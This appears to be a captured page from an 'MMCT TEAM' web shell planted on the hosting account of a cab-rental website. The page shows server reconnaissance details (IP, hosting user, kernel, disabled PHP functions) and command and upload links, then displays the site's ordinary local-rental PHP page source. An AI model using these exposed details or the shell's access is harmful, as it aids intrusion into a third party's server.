MMCT TEAM
Server IP : 82.112.239.40  /  Your IP : 18.218.99.99
Web Server : LiteSpeed
System : Linux in-mum-web1676.main-hosting.eu 5.14.0-503.35.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 4 05:23:43 EDT 2025 x86_64
User : u641149403 ( 641149403)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u641149403/domains/cabz4you.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u641149403/domains/cabz4you.com/public_html/local-rental.php
<?php include('include/common.php'); ?>
<!DOCTYPE html>
<html lang="en" style="overflow-x:hidden">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="../ms-icon-144x144.html">
<meta name="theme-color" content="#ffffff">
<title>Local Rental - <?=SITE_NAME?></title>
<?php include "include/header.php" ?>
<style>
    .same-section-spacing  {
        padding: 100px 0;
    }
    .same-section-spacings  {
        padding: 50px 0;
    }
    .bg-banner  {
        background: url(images/chopta_bredcrumb.jpg) no-repeat;
        background-size: cover;
        width: 100%;
        position: relative;
    }
</style>
<section class="same-section-spacing bg-banner">
    <div class="container">
        <div class="row">
            <div class="col-lg-12">
                <div class="banner-box">
                    <h2></h2>
                    <nav aria-label="breadcrumb">
                        <ol class="breadcrumb">
                            <li class="breadcrumb-item"><a href="index.php">Home</a></li>
                            <li class="breadcrumb-item active" aria-current="page">Local Rental</li>
                        </ol>
                        <h2 style="text-align: center;
                        ">Local Rental</h2>
                        <hr id="hr3">
                    </nav>
                </div>
            </div>
        </div>
    </div>
</section>

<?php include('form.php'); ?>


<div class="wrappercontent mt-1 pb-5">
    <div class="block-title text-center">
        <h2>Local Rental Cabs</h2>
        <hr id="hd" class="mx-auto" style="margin-top:10px;">
    </div>
    <!-- Trending -->
    <div class="container-fluid">
        <div class="row mt-4 p-4 text-justify">
            <strong class="h4 w-100 text-left">Popular Local Rental →</strong>
             <?php
             include('include/config.php');
             $q = "select * from local_rental";
             $query = mysqli_query($db,$q);
             while($res = mysqli_fetch_array($query))  {
                ?>
            <div class="col-md-3 mt-5">
                <div class="card text-white card-has-bg click-col" style="background-image:url('admin/web-admin/<?php echo $res['image']?>');">
          <div class="card-img-overlay d-flex flex-column">
            <div class="card-body">
              
            </div>
            <div class="card-footer">
              <div class="media">
                <div class="media-body">
                  <h6 class="my-0 text-white d-block"><?php echo $res['title']?></h6>
                </div>
              </div>
            </div>
          </div>
        </div>
            </div>
             <?php } ?>
        </div>
</div>
<!--End Trending -->


<div class="container-fluid">
    <div class="row bg-white bg-white p-4 text-justify">
        <p></p>
        <p>
            With Cabz 4 U, one way cab booking may be the best deal while making mind to drop to a specific location from your current city. It saves your fare from both side packages and makes the deal affordable. If planning your
            trip for any long destination or nearby spot, you can get easily a one-way car rental from Cabz 4 U and get a cheap dropping fare when your plan to stay for some time there. You find it totally reasonable when touring for
            a long destination and multi-days, and also you do not require the cab local. This time, we can provide you with the cheapest one-way car fare deal to make your journey easy and stress-free.
        </p>

        <h2><strong>Why Choose Cabz 4 U for One Way Cabs?</strong></h2>

        <p>
            During hiring a one way car rental, Cabz 4 U totally makes sure about your final destination and plans for a frequent drop service. You can book a taxi-cab for your one way trip with just a few clicks on the Internet and
            get it within a few hours at your door-step. With a well-trained driver fully familiar with the ways of your destination, it would become more comfortable to complete your one way journey within your planned duration. With
            the cheapest cab fare rates, Cabz 4 U easily makes available one-side car hire for your fastest one way drop trip. And also offers affordable one-way cars on rent that fully support your budget with a variety of cars like
            Innova, Tavera, Ertiga, Swift Dzire, and Tata Zest with different seater Tempo Travelers.
        </p>
        <p></p>
    </div>
</div>
</div>


<script>
    $(function()  {
        $( "#states" ).autocomplete( {
            source: 'search.php'
        });
    });
</script>
<!-- ============== -->
<script>
    $(function()  {
        $( "#sources" ).autocomplete( {
            source: 'one-search.php'
        });
        $( "#desti" ).autocomplete( {
            source: 'one-search.php'
        });
    });
</script>
<script>
    $(function()  {
        $( "#sources" ).autocomplete( {
            source: 'one-search.php'
        });
        $( "#desti" ).autocomplete( {
            source: 'one-search.php'
        });
    });
</script>
<script defer>
    function getMonthName(a) {
        var e="";
        switch(a) {
        case 1:e="Jan";
            break;
        case 2:e="Feb";
            break;
        case 3:e="Mar";
            break;
        case 4:e="Apr";
            break;
        case 5:e="May";
            break;
        case 6:e="Jun";
            break;
        case 8:e="Aug";
            break;
        case 9:e="Sep";
            break;
        case 10:e="Oct";
            break;
        case 11:e="Nov";
            break;
        case 12:e="Dec";
            break;
        default:e="Invalid"
        }
        return e
    }
    $(document).ready(function() {
        Date.prototype.addHours=function(t) {
            return this.setHours(this.getHours()+t),this
        };
        var e=(new Date).addHours(2);
        a=String(e.getDate()).padStart(2,"0"),t=String(e.getMonth()+1).padStart(2,"0"),r=parseInt(e.getFullYear().toString().substr(2,2),10),n=12<=e.getHours()?"PM":"AM",s=e.getMinutes(),c=e.getHours(),b=(c=(c%=12)||12)+":"+(s=s<10?"0"+s:s)+" "+n,todayDate=a+" "+getMonthName(parseInt(t))+"'"+r+" - "+b;
        var d="";
        if(d=="") {
            $(".datepicker").val(todayDate)
        }
        var transfer_type="";
        1==transfer_type?($("#transfer_pick_div").removeClass("d-block"),$("#transfer_pick_div").addClass("d-none"),$("#transfer_drop_div").addClass("d-block")):2==transfer_type&&($("#transfer_pick_div").addClass("d-block"),$("#transfer_drop_div").addClass("d-none"),$("#transfer_drop_div").removeClass("d-block"));
        var type="";
        if(type) {
            $.ajax( {
                url:"localities",type:"POST",data: {
                    "city_name":$("#transfer_source").val()
                },
                dataType:"JSON",success:function(response) {
                    autocomplete(document.getElementById("transfer_drop"),response);
                    autocomplete(document.getElementById("transfer_pick"),response)
                }
            })
        }
        var today=new Date();
        var date=today.getFullYear()+'-'+(today.getMonth()+1)+'-'+today.getDate();
        $("#out_drop_date").datetimepicker( {
            format:"dd-M-yyyy",weekStart:1,todayBtn:!0,autoclose:!0,todayHighlight:!0,startView:2,minView:2,forceParse:0,startDate:date,pickerPosition:"bottom-left"
        });
        var session_drop_date="";
        if(session_drop_date) {
            $("#out_drop_date").val(session_drop_date)
        }
        else {
            $("#out_drop_date").val(String(today.getDate()).padStart(2,"0")+" "+getMonthName(today.getMonth()+1)+"'"+today.getFullYear().toString().substr(2,2))
        }
        $("#out_pick_date").datetimepicker( {
            format:"dd-M-yyyy - HH:ii P",autoclose:!0,showMeridian:!0,todayBtn:!0,pickerPosition:"bottom-right"
        })
        .on("changeDate",function(e) {
            var o=e.date;
            var i=new Date(e.date.valueOf());
            $("#out_drop_date").datetimepicker("setStartDate",i),$("#out_drop_date").val(String(i.getDate()).padStart(2,"0")+" "+getMonthName(i.getMonth()+1)+"'"+i.getFullYear().toString().substr(2,2));
            $("#out_drop_date").datetimepicker( {
                format:"dd-M-yyyy",weekStart:1,todayBtn:!0,autoclose:!0,todayHighlight:!0,startView:2,minView:2,forceParse:0,pickerPosition:"bottom-left"
            })
        });
        var destinations="";
        if(destinations)
            for(var strArray=destinations.split(" to "),k=20,c=0;
                c<strArray.length;
                c++)k++,$.ajax( {
                    url:"cities_name",type:"POST",data: {
                    },
                    dataType:"JSON",success:function(t) {
                        autocomplete(document.getElementById("out_destination"+k.toString()),t.all_cities)
                    }
                });
                $("#modify_outstation").on('shown.bs.modal',function() {
                    $('body').css('padding-right',0)
                });
                $("#btn_oustation").click(function() {
                    var ddate=$("#out_drop_date").val();
                    if(ddate=="") {
                        $("#out_drop_date").focus();
                        $("#err_drop").text("Please enter drop date!");
                        return!1
                    }
                })
            });
        </script>
        <?php include "include/footer.php" ?>

MMCT - 2023